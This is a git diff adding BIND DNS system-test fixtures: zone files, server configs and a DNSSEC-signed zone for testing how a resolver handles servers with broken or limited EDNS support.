SOA ns1. marka.isc.org 1 0 0 0 0 +. NS ns1. +ns1. A 10.53.0.1 +dropedns. NS ns.dropedns. +ns.dropedns. A 10.53.0.2 +dropedns-notcp. NS ns.dropedns-notcp. +ns.dropedns-notcp. A 10.53.0.3 +plain. NS ns.plain. +ns.plain. A 10.53.0.4 +plain-notcp. NS ns.plain-notcp. +ns.plain-notcp. A 10.53.0.5 +edns512. NS ns.edns512. +ns.edns512. A 10.53.0.6 +edns512-notcp. NS ns.edns512-notcp. +ns.edns512-notcp. A 10.53.0.7 +ednsformerr. NS ns.ednsformerr. +ns.ednsformerr. A 10.53.0.8 +ednsnotimp. NS ns.ednsnotimp. +ns.ednsnotimp. A 10.53.0.9 +ednsrefused. NS ns.ednsrefused. +ns.ednsrefused. A 10.53.0.10 diff --git a/bin/tests/system/legacy/ns1/trusted.conf b/bin/tests/system/legacy/ns1/trusted.conf new file mode 100644 index 0000000..73500fc --- /dev/null +++ b/bin/tests/system/legacy/ns1/trusted.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +trust-anchors { + "edns512-notcp." static-key 257 3 10 "AwEAAcEBkn/cuVhdRTWMHt19O7h9F4Hx2t68u1JUZg7swLLvwfljqnNYjsKYk9EzUhIaYOAHtVe7//cYwoVU4BFhY2DGbx1YE1LnKIGxfqpopFxDZC34TTl6jpoTP6kvj+XpeO0HfF2+DcyNgnQcMGgHXyLWeRUJFt1As6o9tmsBiInGIZMTE3/rANhtAGMLNzhRLN7CS/Tc5GhKaL66uebyEYenEOAyDVgsuhr8Q9D5ka6xZmxzXFVswy2KvsSxu9aoxVq4nACjIeTZ4GJy0v83zclV7hA+5jlPDXMFtIpvwux5XALrNkUUPq+Fb5sc5/u141LcvdASnlk58I77HbsnfausvDxdYYxEns7K9e9N85dwyreM/OGTmm8p4hNDngZESAea7MrSCsJpOGn9XLkVe6gZnBgB1cra+ezzTSWn+4QH17lIhFXYNjMV83df2h/gH3Gmthqnr9RgknZga8B/Czc7TeX6iy2gAOshKGyb6w12eJim1L8tS5T138V8d6SigzxZz1raiJNolVhXyA8SbbDpgBrcoEXN/WjwvWI+2ol5gzlqMeNw/F9SMoWdpGIWkkNCNWBbhLWhp6qfhpRLUFwVys54LGOIGSVRd9uJmc2hPdXoP8ephnCIeNJb8Zp6DnpssyN0JaF815dKkOHff9GEjaiRLj0xWvtZSqNFaGoB"; +}; diff --git a/bin/tests/system/legacy/ns10/ednsrefused.db b/bin/tests/system/legacy/ns10/ednsrefused.db new file mode 100644 index 0000000..9aa3a4a --- /dev/null +++ b/bin/tests/system/legacy/ns10/ednsrefused.db @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 60 SOA ns marka.isc.org. 1 0 0 0 0 +@ 60 NS ns +ns 60 A 10.53.0.8 diff --git a/bin/tests/system/legacy/ns10/named.conf.in b/bin/tests/system/legacy/ns10/named.conf.in new file mode 100644 index 0000000..628c51a --- /dev/null +++ b/bin/tests/system/legacy/ns10/named.conf.in @@ -0,0 +1,29 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.10; + notify-source 10.53.0.10; + transfer-source 10.53.0.10; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.10; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; +}; + +zone "ednsrefused" { + type primary; + file "ednsrefused.db"; +}; diff --git a/bin/tests/system/legacy/ns10/named.ednsrefused b/bin/tests/system/legacy/ns10/named.ednsrefused new file mode 100644 index 0000000..6b43ac0 --- /dev/null +++ b/bin/tests/system/legacy/ns10/named.ednsrefused @@ -0,0 +1 @@ +ednsrefused diff --git a/bin/tests/system/legacy/ns2/dropedns.db b/bin/tests/system/legacy/ns2/dropedns.db new file mode 100644 index 0000000..06c023c --- /dev/null +++ b/bin/tests/system/legacy/ns2/dropedns.db @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 60 SOA ns marka.isc.org. 1 0 0 0 0 +@ 60 NS ns +ns 60 A 10.53.0.2 diff --git a/bin/tests/system/legacy/ns2/named.conf.in b/bin/tests/system/legacy/ns2/named.conf.in new file mode 100644 index 0000000..e570ffe --- /dev/null +++ b/bin/tests/system/legacy/ns2/named.conf.in @@ -0,0 +1,29 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; +}; + +zone "dropedns" { + type primary; + file "dropedns.db"; +}; diff --git a/bin/tests/system/legacy/ns2/named.dropedns b/bin/tests/system/legacy/ns2/named.dropedns new file mode 100644 index 0000000..37dd9cf --- /dev/null +++ b/bin/tests/system/legacy/ns2/named.dropedns @@ -0,0 +1 @@ +dropedns diff --git a/bin/tests/system/legacy/ns3/dropedns-notcp.db b/bin/tests/system/legacy/ns3/dropedns-notcp.db new file mode 100644 index 0000000..0ac44bc --- /dev/null +++ b/bin/tests/system/legacy/ns3/dropedns-notcp.db @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 60 SOA ns marka.isc.org. 1 0 0 0 0 +@ 60 NS ns +ns 60 A 10.53.0.3 diff --git a/bin/tests/system/legacy/ns3/named.conf.in b/bin/tests/system/legacy/ns3/named.conf.in new file mode 100644 index 0000000..3d89554 --- /dev/null +++ b/bin/tests/system/legacy/ns3/named.conf.in @@ -0,0 +1,29 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; +}; + +zone "dropedns-notcp" { + type primary; + file "dropedns-notcp.db"; +}; diff --git a/bin/tests/system/legacy/ns3/named.dropedns b/bin/tests/system/legacy/ns3/named.dropedns new file mode 100644 index 0000000..37dd9cf --- /dev/null +++ b/bin/tests/system/legacy/ns3/named.dropedns @@ -0,0 +1 @@ +dropedns diff --git a/bin/tests/system/legacy/ns3/named.notcp b/bin/tests/system/legacy/ns3/named.notcp new file mode 100644 index 0000000..e25c3a8 --- /dev/null +++ b/bin/tests/system/legacy/ns3/named.notcp @@ -0,0 +1 @@ +notcp diff --git a/bin/tests/system/legacy/ns4/named.args b/bin/tests/system/legacy/ns4/named.args new file mode 100644 index 0000000..0fe6774 --- /dev/null +++ b/bin/tests/system/legacy/ns4/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 99 -D legacy-ns4 -X named.lock -g -U 4 -T maxcachesize=2097152 -T noedns diff --git a/bin/tests/system/legacy/ns4/named.conf.in b/bin/tests/system/legacy/ns4/named.conf.in new file mode 100644 index 0000000..32bdb05 --- /dev/null +++ b/bin/tests/system/legacy/ns4/named.conf.in @@ -0,0 +1,29 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; +}; + +zone "plain" { + type primary; + file "plain.db"; +}; diff --git a/bin/tests/system/legacy/ns4/plain.db b/bin/tests/system/legacy/ns4/plain.db new file mode 100644 index 0000000..2c20a70 --- /dev/null +++ b/bin/tests/system/legacy/ns4/plain.db @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 60 SOA ns marka.isc.org. 1 0 0 0 0 +@ 60 NS ns +ns 60 A 10.53.0.4 diff --git a/bin/tests/system/legacy/ns5/named.args b/bin/tests/system/legacy/ns5/named.args new file mode 100644 index 0000000..364370a --- /dev/null +++ b/bin/tests/system/legacy/ns5/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 99 -D legacy-ns5 -X named.lock -g -U 4 -T maxcachesize=2097152 -T noedns diff --git a/bin/tests/system/legacy/ns5/named.conf.in b/bin/tests/system/legacy/ns5/named.conf.in new file mode 100644 index 0000000..92e754f --- /dev/null +++ b/bin/tests/system/legacy/ns5/named.conf.in @@ -0,0 +1,29 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; +}; + +zone "plain-notcp" { + type primary; + file "plain-notcp.db"; +}; diff --git a/bin/tests/system/legacy/ns5/named.notcp b/bin/tests/system/legacy/ns5/named.notcp new file mode 100644 index 0000000..e25c3a8 --- /dev/null +++ b/bin/tests/system/legacy/ns5/named.notcp @@ -0,0 +1 @@ +notcp diff --git a/bin/tests/system/legacy/ns5/plain-notcp.db b/bin/tests/system/legacy/ns5/plain-notcp.db new file mode 100644 index 0000000..9c1a96b --- /dev/null +++ b/bin/tests/system/legacy/ns5/plain-notcp.db @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 60 SOA ns marka.isc.org. 1 0 0 0 0 +@ 60 NS ns +ns 60 A 10.53.0.5 diff --git a/bin/tests/system/legacy/ns6/edns512.db.in b/bin/tests/system/legacy/ns6/edns512.db.in new file mode 100644 index 0000000..7c2309b --- /dev/null +++ b/bin/tests/system/legacy/ns6/edns512.db.in @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 60 SOA ns marka.isc.org. 1 0 0 0 0 +@ 60 NS ns +ns 60 A 10.53.0.6 diff --git a/bin/tests/system/legacy/ns6/edns512.db.signed b/bin/tests/system/legacy/ns6/edns512.db.signed new file mode 100644 index 0000000..1493dd8 --- /dev/null +++ b/bin/tests/system/legacy/ns6/edns512.db.signed @@ -0,0 +1,248 @@ +; File written on Fri Dec 5 16:35:57 2014 +; dnssec_signzone version 9.11.0pre-alpha +edns512. 60 IN SOA ns.edns512. marka.isc.org. ( + 1 ; serial + 0 ; refresh (0 seconds) + 0 ; retry (0 seconds) + 0 ; expire (0 seconds) + 0 ; minimum (0 seconds) + ) + 60 RRSIG SOA 10 1 60 ( + 20441127043557 20141205043557 59033 edns512. + Xqas69NmX1N9jXSQntGXjcDTmZpO542fJURc + peYqY2gD445jxcH6FwmdMbzyPX4Nel+ZKdqx + wzb6U4S2sc7V1Wt8sOuNWil3LOaF9Mr2ZhL9 + /BgFaZixYdij0dFkUyuaSRfDx+3rvYtGZBRW + w55/U2bRvIgk0TjH+XHOUM+l5n755bsH1GFP + kRxhsYtsrUdWrB7Wn5lOdURsIf31xUfuMejR + QO5UIeqIgLhqE67GTy4SkfJW01G97Fkmt9Kx + 6K1gIwOeJy2rHN9WIF9vLJ2nyxWiSkmUka7l + Zw3kuR9fjgrFE8FEy4e/J8VIoq0v9bnwLh8a + woBnoQoZcfngu56e5hyF+g4t91JDbViOMAcJ + /DWsaGa7IF0o61Z51XoOakpgV4TP3VU53jFr + gfc4HDKP3sQQH9ZqzOpkXtoWGpSQ+u+2jSYu + NKa05LW4q1SJf8DHTiMxAUkkbikGHemskgIm + 0MESkBJI95/M3FbsRc9FswOeX0ZaRo3+6982 + elE1T0ZVPOWjPq1L5upWvUZDP0/d+2ns7Yt/ + MY5dKXjl74kQWTIDdeUC/8aaWFiJhsx7Haa1 + LhHtttBHtQQKQBo8uWVoTHDs9XY7pDcpkF6Z + /NzaCOVHFKh4Ahpr9xwY1J9Cy56oRIq5AEP9 + HmtN1vS04jbad220C+jfkDPJH9s64MKggQ4= ) + 60 NS ns.edns512. + 60 RRSIG NS 10 1 60 ( + 20441127043557 20141205043557 59033 edns512. + G9qrHjBQZ+jcueOhibtN18rXYEaLzWOZh1o2 + ZRQ9jS59BJd0KJ4taQzpz4CxA/juqEjSCmuY + Vynfeg15u4wvUf1/anC38Rp/QG0MHPrFily0 + DzeS/o2plYNCJ8r2wOmufG34rZakXZs2EdBf + 9s3+f+vqx+WsIs1TfaayGi90qDxVjn/SKGqb + v/eXGmYxyRMTaQ2x0+8y018MT+7zLbb3/VvV + EuD8X+J8N8dZiw3Rc1X6zj3usSOEO6wa4GRk + Oss3CMkYJuMND/3RG6XGt6du4hl3lK3+UK/4 + bb/D5FBlCJc76bkmo8ZmUjxKGXXGzh9w+bMT + rt0GfabUcbQyWyOifIsWOeIxYVpvUHusk7VT + gvvhfqXabGT7pPoCPz97IW820qTXKPPX/Rzb + DpRgWdVdQDWcmhb4RBDQrr1DDMmBJlz91S4Q + 0lDAnSMfMO2JIpJKOFNHnsMgLayEvdKOKQOH + ESKzbylxL4qARAq4zYbwz3vY6VDCV5MGcnAT + 3XMNM9RwRq0/qMuE8XfPmRaDimIOLaEojMpU + 59sFvaKzvn7t1h1ZQVLuJqu3jkWwz4iUtwts + +av/IdbbKP6spPy4gimngRWbpiiQHESNx9kp + EHB85/UAR28RffvPadNoQq1eaAOQJCEJf7xv + BOGytbBxrLFsTWrmrB5uCb9hujWu04unJyc= ) + 0 NSEC ns.edns512. NS SOA RRSIG NSEC DNSKEY + 0 RRSIG NSEC 10 1 0 ( + 20441127043557 20141205043557 59033 edns512. + BY9hQLrs9zkekTWeXmSqT+8dCZ+vaRBGSSUf + E8BUr4gYbuzo7xeOpHjMkpO7IpkT80TRcIQf + AkleOlf3+XcUIhK9/7C/xu0/jI3XbaBs5NNJ + 0zhf0CmJBzeCSMtxXInDLGkhGMgoclB3j5+f + nme65PHYFVEVWS/64ZRd71XUUV2kTk4slfqx + YNGhT7IPcgUTNOrsBGi6SmH2iKMseg2BfFOt + +2RRY9HBlfKywozHz9jjWsEmRZke3fqfpuln + C6r3EQ873XBjrsOrDerNaSDf29Zl46SQs3UQ + kCJZ0gWEReRvvooLlh4+PsbIW1M0FMmsImfv + l1kPh8kQgJVxljba7kXX3k5bc/YwTQE3rI6e + ametdxSwbxcUZiUr8rM2ZF4IfqFGS05sD+Cz + 68dDDyR/vu+6Rt/U+39bzg2tI4Ok6aQxOgXP + v+hhOC8Sancpmn+SHLQvYoMW/VxR633TeyW3 + zn4Xhcp7aD4TdKHGK9PpVrtWcx50zZEXu17c + essPk0yDOarTmoqx0r3LSe5jjDLJJ5kZxWxM + nlfkw3aKQwQMuyaVWN+Ruz7KRgD9lkwoOic4 + Qs/7PYpMrV58YVlEa7aESd3+qPHjv6dD99Zm + Fe6bc+SqUTKwjeYfIm/luc70FpykGhdxTK/E + dEjQJ8jMrAzCCr/or/JOHgV1yrTCfU3hAN8= ) + 60 DNSKEY 256 3 10 ( + AwEAAcEBkn/cuVhdRTWMHt19O7h9F4Hx2t68 + u1JUZg7swLLvwfljqnNYjsKYk9EzUhIaYOAH + tVe7//cYwoVU4BFhY2DGbx1YE1LnKIGxfqpo + pFxDZC34TTl6jpoTP6kvj+XpeO0HfF2+DcyN + gnQcMGgHXyLWeRUJFt1As6o9tmsBiInGIZMT + E3/rANhtAGMLNzhRLN7CS/Tc5GhKaL66ueby + EYenEOAyDVgsuhr8Q9D5ka6xZmxzXFVswy2K + vsSxu9aoxVq4nACjIeTZ4GJy0v83zclV7hA+ + 5jlPDXMFtIpvwux5XALrNkUUPq+Fb5sc5/u1 + 41LcvdASnlk58I77HbsnfausvDxdYYxEns7K + 9e9N85dwyreM/OGTmm8p4hNDngZESAea7MrS + CsJpOGn9XLkVe6gZnBgB1cra+ezzTSWn+4QH + 17lIhFXYNjMV83df2h/gH3Gmthqnr9RgknZg + a8B/Czc7TeX6iy2gAOshKGyb6w12eJim1L8t + S5T138V8d6SigzxZz1raiJNolVhXyA8SbbDp + gBrcoEXN/WjwvWI+2ol5gzlqMeNw/F9SMoWd + pGIWkkNCNWBbhLWhp6qfhpRLUFwVys54LGOI + GSVRd9uJmc2hPdXoP8ephnCIeNJb8Zp6Dnps + syN0JaF815dKkOHff9GEjaiRLj0xWvtZSqNF + aGoB + ) ; ZSK; alg = RSASHA512; key id = 59033 + 60 DNSKEY 257 3 10 ( + AwEAAcEBkn/cuVhdRTWMHt19O7h9F4Hx2t68 + u1JUZg7swLLvwfljqnNYjsKYk9EzUhIaYOAH + tVe7//cYwoVU4BFhY2DGbx1YE1LnKIGxfqpo + pFxDZC34TTl6jpoTP6kvj+XpeO0HfF2+DcyN + gnQcMGgHXyLWeRUJFt1As6o9tmsBiInGIZMT + E3/rANhtAGMLNzhRLN7CS/Tc5GhKaL66ueby + EYenEOAyDVgsuhr8Q9D5ka6xZmxzXFVswy2K + vsSxu9aoxVq4nACjIeTZ4GJy0v83zclV7hA+ + 5jlPDXMFtIpvwux5XALrNkUUPq+Fb5sc5/u1 + 41LcvdASnlk58I77HbsnfausvDxdYYxEns7K + 9e9N85dwyreM/OGTmm8p4hNDngZESAea7MrS + CsJpOGn9XLkVe6gZnBgB1cra+ezzTSWn+4QH + 17lIhFXYNjMV83df2h/gH3Gmthqnr9RgknZg + a8B/Czc7TeX6iy2gAOshKGyb6w12eJim1L8t + S5T138V8d6SigzxZz1raiJNolVhXyA8SbbDp + gBrcoEXN/WjwvWI+2ol5gzlqMeNw/F9SMoWd + pGIWkkNCNWBbhLWhp6qfhpRLUFwVys54LGOI + GSVRd9uJmc2hPdXoP8ephnCIeNJb8Zp6Dnps + syN0JaF815dKkOHff9GEjaiRLj0xWvtZSqNF + aGoB + ) ; KSK; alg = RSASHA512; key id = 59034 + 60 RRSIG DNSKEY 10 1 60 ( + 20441127043557 20141205043557 59033 edns512. + QYXBCtuqzY2R7s4sIDFmSkhLqXXYAAdm5T3x + MddwlppybV0tEnkRdgWD+3VL2PAdr+MMFigm + OCohMdYAXOhJwW9OHiSkeIpYamojB+eBPDBl + 63guu73QADTUmffZirWvNb79reVHmKkTPdLm + nEfEs7VEtTm1Wj60jT1q1RIkJDvtIo7mJgRO + MYKyJBCocBUSGGXoHCA+djXCqKiuLavQ2rBu + IGxXtB2Pf2Wkw/9xxhBo5vTrT1u+V2hFGMPO + vnODw0lU4XiSjeBrmMXnadrsx8DrM4KInwAL + A9VolAXXWjqvD3il54ziqikkjTYnOeyik3QM + R7UtDrLTLnAeyeL9rhLuBk2dnsE+XaJ2PP3q + iD7LiEQLDGGKJRC3P6odVb17e7q0mDtH2HId + VdjGap+W6mxql8aVrRHs5P0t/5GJmW83JbJi + e7W3Y1ikoimB4S6FPBbjadaUEpzUs806SIdj + v/AZoydoa/qOdre9Pur51At2dQNgeFhIL9w+ + 2IcN3pRjojTPrMToqVRqOySzx6OzvSmnydDg + PMe4yoqpzumJLQXJ2IceEg5rlLaRjMOBYSW8 + VuqLMfEup+KBEg+nZv6mAmx1KLuIgO5q5ae9 + tq0I7eaV/EPvBYxO7j2RA0AbtmGSUyP4ZzTy + FjIYfOqzwwPjONzLQ2E/RsbS5MlIAk92aC0= ) + 60 RRSIG DNSKEY 10 1 60 ( + 20441127043557 20141205043557 59034 edns512. + V13nqWSVWVdkN/RZnJ+4ywjju3JoRbQrpnjL + RKPi4U8cOc1nnh64y4RvaIe+2TI1hiVKYHfE + 9XGXZb2zhxrWMq8kLjpIRN+jpItoFXu7rSRA + GmiHz7v7PW7+UHz7fhGHKJuqQuodBokTlHhR + /0mNkaDQ96OOyG/aLOfj6Jj16KEBfyM8hALy + jwWE8EOKzV37CLBWawazXVY/EAP5jzQuAaot + SPh3wFuJ2L6rB4lkh5IwaeXU42ip7eirT2i5 + V9W2v01UWbQ3Jab1DJlNwVgNGzXYvCvLU9zG + EHbqVcDuMErOqFzePLhK7Aqh8LIB9DnQlFqE + 2tyATJb0hcMetMNRiInJFGPMekdNiTguhLMC + GyEjzEJdiKT0XA/lVF9MVyEqL2HeSj3NYRe6 + ScfqAZArEPgu+UI0CaiC2eR8KdQCPcwUJuNE + mNdv3F9CnNvq3w72Q3TJpOaFzuToQh8JleTN + Ty3zRkVGKWSDNs+px9sedJkRpaRyVQVXJruT + /boYT8HgK8R6PXIp3Ujud0SSlVjPQrlbxF/P + 5saDwruBkYPRKNGBC0OVcHhI+w1N3gkp59kY + CqBih/kazLfWjUXxc130OEkPhmS1zUEOjsl2 + fmRhKrlRmPM1DyHqFiEVogj/nfZ+VCiO4bIx + F+vVQX+EqQo0p3bRvfSxpY/I7fM0P6/cZlQ= ) +txt500.edns512. 60 IN TXT "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" + 60 RRSIG TXT 10 2 60 ( + 20441127043557 20141205043557 59033 edns512. + OtzlxomsR6xFpPI19gEpl5edx+rbqjrhR6CI + zWiqpjHv5HhdydRPIW6M8KSuBDK/AOuUCy1P + 9qOy7J0QUIGK8Ds4wcw09VCqkxImVu6w7e+z + HoaNJzKT4Oxf1LLrvUnitqEbS4cME15r+Fj4 + cUlkpSZgttMcGhV+VPEiG3z56KzXNAViapJl + HaV10Be0nx0UtEpftkAtgnkXwNPIaDrbULUI + tvD/uvu3ICV5gRATriy3RcanB9c0xKEO9NAm + nbWQD8a7o+zs3OqqDRcZqvq0PRuz7X8Q4T/n + fPYNkGoph1etQTaM1F6V0gP/2Hxv/oQclL77 + IQSRZ8zCZJech8qgBlEHgdY/4hqJzJtO98Ha + OfB7ixmHp9fE5dGInIot6eMKN+Utnl2KLjjn + oO05gh9VESsgDIOM2amN/aViP54ad5DFtJni + 1mLRhV7FmBD2WSkdZF4/u4SvxjKYpWF1pspO + xNPhgaavnAqkM361P0kV13StLXzff9g9QsuB + S8Z4v0Ypiv4s5SlXsKeTpa0Y1gKXf8U1UZGq + /+2089ZurC8S1D89m72M3hgP80TDnLeuDCHY + /3tpU4V0yZ0u2riJG8/4MVFeeo8suk/z2gq0 + nvs3YD7U0XB5ozLUlnKTT+NK49lnv5xoIByL + +ezP5zXMz4D0KAfKk+Wn84RgYn3ADABr1ZI= ) + 0 NSEC edns512. TXT RRSIG NSEC + 0 RRSIG NSEC 10 2 0 ( + 20441127043557 20141205043557 59033 edns512. + nFZKkyTy5O+je3VUaWt/eqVDqPtpktHFJt5X + K1TJHvRbuEanNMJoQJidS6ZhawgJhK54qgcM + klsR2n/eZ61Wbr1dpUscI7PNWGtZThW18d6W + GQjfxvLVSi+YVcSlAt5Jfc+4KZ+Mcte25xOD + DJMWVXTv2AgKt9T7JdOQTrpiugkpflct87FQ + 95POqtj5j72xnTvpjzaDcL22rD5q3kLQlQ14 + xDZV1hOgqCYgbYVgwxgxigWSuWkKjiHiYR9o + YkLPkWHYNn7aDDFpAve4MJXRpuwPP9/TLQKH + hV4H8q7CZK30uKpUqy38JGTQzr7FDgTekGCd + InPLwSrURIkn3rVyCRq7PgvSBNXNW+3h9tYX + gMj6FDNyroWRH1eWmDFg3BmXKu6hUxrZ2fOk + wyhJ5M0LtZinjd5RuHy0CCKFuFA/Gv3Zga0m + vc34auzfwLnQmJc94j3JfwUGlMDeKtizKrhK + PahfCxEMVhY9E9LKx0UsbtJJ1ZgeNsm+zF5E + 6TkzYFc+hHeYM2/Jb2PVxjTmOkbfRoDmnRCd + 9Fus/kFtbgUK6ukpaQsNgdkwtLT8++FiaJUs + ion91SQWK7wjW3Fm+zMA88K/vzSQtv9mGUry + oZ4qpK1PFpafpzUVODx3HSS5RCPGZzd4zuDR + 6u7jgRUH3mokpudb4X1qt9L6tVyMLPqAaq8= ) +ns.edns512. 60 IN A 10.53.0.6 + 60 RRSIG A 10 2 60 ( + 20441127043557 20141205043557 59033 edns512. + BLCw43y8QO0QFaQpBPbMgLk3iIStBvp08qp6 + wRCslXGRNK279mlNd29ZROVwmU7jrNd5jTIt + KhYlO/9DX0JMuTrG3W+tsGkGNqx3LNsVt6/U + rfF7iAxzBjnY4MRv0DIIKJqgEuz+A/vmbGQi + L0QxukaNPycQUEnMBbNmVvEi6uETW0yMPugn + BPg2jSVbrd/lY40K1yyUme//q8ljvneU++Mg + mmQ2crmINUQX3h4NBmXoOun0T5hehqiSvz4n + TUO9rhSMWFJxCvUcjndha2MBEm3/H5MhqHqH + vEFlL9/yDScmwT6FW7yoVtcoQzPymgimBIlB + SW75upaIy6EQcx88WhANB+oEm3JsIwufcpUl + jwe7taxtCV1VYxqbqH9ynEzbUH956pE6gsvW + 1lYrqzkmKl1l4YdJEr/Um8daVT88OR8ClP/3 + v3OhAjmvnzl6WolaMPARCkFtswK8Awd61qDw + T11lTu7k0jB7Xx0JNzP2L/ehPaLokctPvECl + lMbHUryP30VnfBahCewO3/15+sUEhKrrlCif + G/MSFzDWbV11X1ItEQcBWgfcvhNfmAgQ0bsi + HgrgUuFIkmosoQUPEqJFCggTMYNZ769zEv/a + 9gJpLo5AmQqZYCn0sOw59IgXHUOsDoStB+WB + vAl9Q3ePoJ8wd+4sBC4KJs++Hw5pJ1oU+ks= ) + 0 NSEC txt500.edns512. A RRSIG NSEC + 0 RRSIG NSEC 10 2 0 ( + 20441127043557 20141205043557 59033 edns512. + DP0dAdDzZRS91BYNOzrHPbcGRRDTdkk+fAHi + Zb+kQ6Eur3EbXrrc/zH9UBmqircogWtOk8iv + h83G5y7Ry/tKQdrqb2igbkLo/BFsyeLKZFLh + DuWbSVvC1Hhs9tzFHVcH5gUObmlrj7wQd3T5 + Iq4ZHbQCHg4OWZbS2gn+90uL/G5OHncE2Ni9 + ELp3puFG+mO5RJJbF6CpU6vVGRs+kQyHREmj + i9kQ6C/12SHPnuIW8v/IP6EUSNb92mJk5n9P + N7EW1E67zCrHSh0rURz627hZRkpt831uod9H + Yf/Uj88zyTkprnBYdflydOzsjBiLMJwMh1CZ + BQ4EkEuRinkFeE3fmKHzv26S/HSbhVIS9E2z + nF7InmHB67uJvqj0oBTP2YFQdrDx5KWNBrqG + 